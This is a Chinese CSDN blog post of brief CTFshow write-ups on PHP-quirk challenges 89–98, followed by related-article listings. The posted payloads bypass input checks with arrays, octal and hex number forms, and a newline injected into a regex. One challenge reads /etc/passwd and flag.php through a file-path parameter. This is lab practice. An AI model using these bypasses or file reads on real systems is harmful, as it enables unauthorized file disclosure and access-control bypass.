[WEB]php特性

最新推荐文章于 2024-06-29 11:32:49 发布
最新推荐文章于 2024-06-29 11:32:49 发布
阅读量5.3k 收藏 5
点赞数 3
分类专栏: Web安全 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/123338355
版权

因为没钱充ctfshow会员,只能跟着视频教程白嫖

89

在这里插入图片描述
intval绕过
提交一个不为空的数组即可绕过
?num[]= //就直接绕过了
intval详解

90

在这里插入图片描述
进制转换直接绕过
?num=0x117c

91

在这里插入图片描述
preg_match('/^php$/i' , $a)
终于知道后面地i是什么意思了,是匹配模式
i是大小写,m是多行匹配

?cmd=%0aphp //通过换行来绕过
preg_match('/^php$/i' , $a) //这个正则这匹配一行

92

在这里插入图片描述
看intval的那个教程
如果 base 是 0,通过检测 var 的格式来决定使用的进制:
如果字符串包括了 “0x” (或 “0X”) 的前缀,使用 16 进制 (hex);否则,
如果字符串以 “0” 开始,使用 8 进制(octal);否则,
将使用 10 进制 (decimal)。

?num=010574
?num=0x117c

93

在这里插入图片描述
字母被ban了
?num=010574

94

在这里插入图片描述
strpos() 函数查找字符串在另一字符串中第一次出现的位置。
所以num中肯定要存在0,但不能是第一个
num=4476.0

95

在这里插入图片描述
num=_010574 //010574是4476八进制形式,因为要有0,但是这个不行
intval(_010574) === 4476 没过

num=+010574 //过了
对加号进行编码,也行
num=%27010574
空格也是可以的
num= 010574
num=%20010574
空格进行编码也可以

96

在这里插入图片描述
u=/etc/passwd //可以读文件
就是你要找到flag.php的位置
u=./flag.php
u=/var/www/html/flag.php //看报错得到这个绝对路径
u=/var/www/html/../html/flag.php

97

在这里插入图片描述

传数组
a[]=1&b[]=2

98

在这里插入图片描述

开心星人
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTFShow _新手必刷_菜狗杯:黑丝白丝还有什么丝?
“the quieter you become, the more you are able to hear”
02-27 478
这道题先过,在单位看这个视频不太合适,回头在自己电脑上做。
CTF中Web题目的各种基础的思路-----入门篇十分的详细
热门推荐
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
【CTFshow】VIP题目限免 通关
人若无名,便可专心练剑
02-11 678
CTFShow是一个CTF(Capture The Flag)竞赛平台,为安全技术爱好者提供了一个进行网络安全攻防实战的平台。CTF是一种网络安全比赛形式,参赛选手通过解决一系列的安全相关的挑战来获得旗帜(flag),以展示自己的技术和解决问题的能力。
ctf.show_VIP题目限免(全)
BvxiE的博客
03-25 5428
VIP题目限免源码泄露前台JS绕过手动源码查看ctrl+u或在网站前面加view-source:Burpsuite禁用javascript的方法协议头信息泄露robots后台泄露补phps源码泄露源码压缩包泄露版本控制泄露源码版本控制泄露源码2vim临时文件泄露cookie泄露**注意:用其他浏览器得到的很奇怪** 这题目全英…英语废一个,所以我把题目全部复制过来了 源码泄露 ‎ 您没有访问所请求资源的权限。它要么是受读保护的,要么不能被服务器读取。 题目提示源码…那就找源码吧! 前台JS绕过 提示
php函数绕过姿势
jie_a的博客
05-11 508
intval($num,0) 传入num[] 数组绕过 Apache HTTPD 换行解析漏洞(CVE-2017-15715) (preg_match(’/^php$/i’, $a) (只有正则最后一个是 $ 才行) payload:abc%0aphp if($num==4476) 传入科学计数法绕过 payload: 4476e123 上一个过滤字母还可以进制绕过 0b?? : 二进制0??? : 八进制 0X?? : 16进制 payload : ?num=010574 在上面的基础上过滤0 if(!s
[ctfshow]php特性练习一
qq_61109509的博客
02-11 1146
目录 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 PHP手册 web89 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag;
CTFshow web入门——php特性
小元砸的博客
02-20 5291
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
ctfshow web入门 php特性
Sentiment的博客
04-11 5271
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
CTFshow php特性 web131
Kradress的博客
12-17 2328
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-13 05:19:40 */ error_reporting(0); highlight_file(__FILE__); include("flag.php"); if(isset($_PO
PHP and MongoDB Web Development
09-20
Web开发中,这种特性使得MongoDB成为处理用户生成内容、日志数据和实时分析的理想选择。 PHP的MongoDB API提供了多种方法来操作数据。例如,`MongoDB\Client`类用于建立到服务器的连接,`MongoDB\Database`类代表...
phpweb网站源码
03-25
PHPWeb框架的特性: 1. **模版引擎**:PHPWeb采用模版引擎技术,将业务逻辑与视图展示分离,使得开发者可以专注于页面设计和后端逻辑的实现,提高了开发效率。 2. **MVC架构**:PHPWeb遵循Model-View-Controller...
phpweb资源共享
06-30
PHPWeb资源共享是其核心特性之一,它极大地提升了网站开发的效率和用户体验。本文将深入探讨PHPWeb如何实现资源共享,以及这一特性在网站开发中的应用。 首先,PHPWeb资源共享的概念是指通过PHPWeb框架,开发者可以...
phpweb 2042
05-13
8. **安全特性**:考虑到Web应用的安全性,模板可能已经考虑了一些基本的安全措施,如防止SQL注入、XSS攻击等,但开发者仍需根据实际项目需求进行安全评估和加固。 9. **性能优化**:为了提升用户体验,模板可能...
PHP和MySQL Web开发
03-31
MySQL的特性包括事务处理、备份恢复、权限控制等,使得它在大型Web应用中也能游刃有余。 PHP和MySQL的结合是Web开发中常见的“LAMP”(Linux、Apache、MySQL、PHP)架构的一部分,为开发者提供了构建动态网站的强大...
自学黑客技术(网络安全
dexi1113的博客
06-24 2775
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
web安全渗透测试十大常规项(一):web渗透测试之Fastjson反序列化
最新发布
HACKONE的博客
06-29 180
FastJson有一个全局缓存机制:在解析json数据前会先加载相关配置,调用addBaseClassMappings()和loadClass()函数将一些基础类和第三方库存放到mappings中(mappings是ConcurrentMap类,所以我们在一次连接中传入两个键值a和b,之后在解析时,如果没有开启autotype,会从mappings或deserializers.findClass()函数中获取反序列化的对应类,如果有,则直接返回绕过了黑名单。,在经过黑白名单后,在加载类时会去掉前后的L和;
网络安全概论
m0_73687800的博客
06-26 464
笔者最近在复习选修的一门信息网络安全的课程,该课程上课PPT乃是纯英文,实在难以开读,转头求索,又无处可得。于是考前深夜阅读计算机网络的网络安全一章,希翼能有所收获。主动攻击:攻击者对某个连接中通过的PDU进行各种处理,共有三类:更改报文流,拒绝报文服务,伪造连接初始化。计算机网络面临四种威胁:截获,中断,篡改,伪造。这四类威胁又可分为两大类:被动攻击和主动攻击。被动攻击:仅观察分析PDU而不干扰。附加一类主动攻击:恶意程序。
网络安全--安全设备(三)IPS
weixin_68864415的博客
06-26 1284
简单讲解和介绍了网络安全设备IPS

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值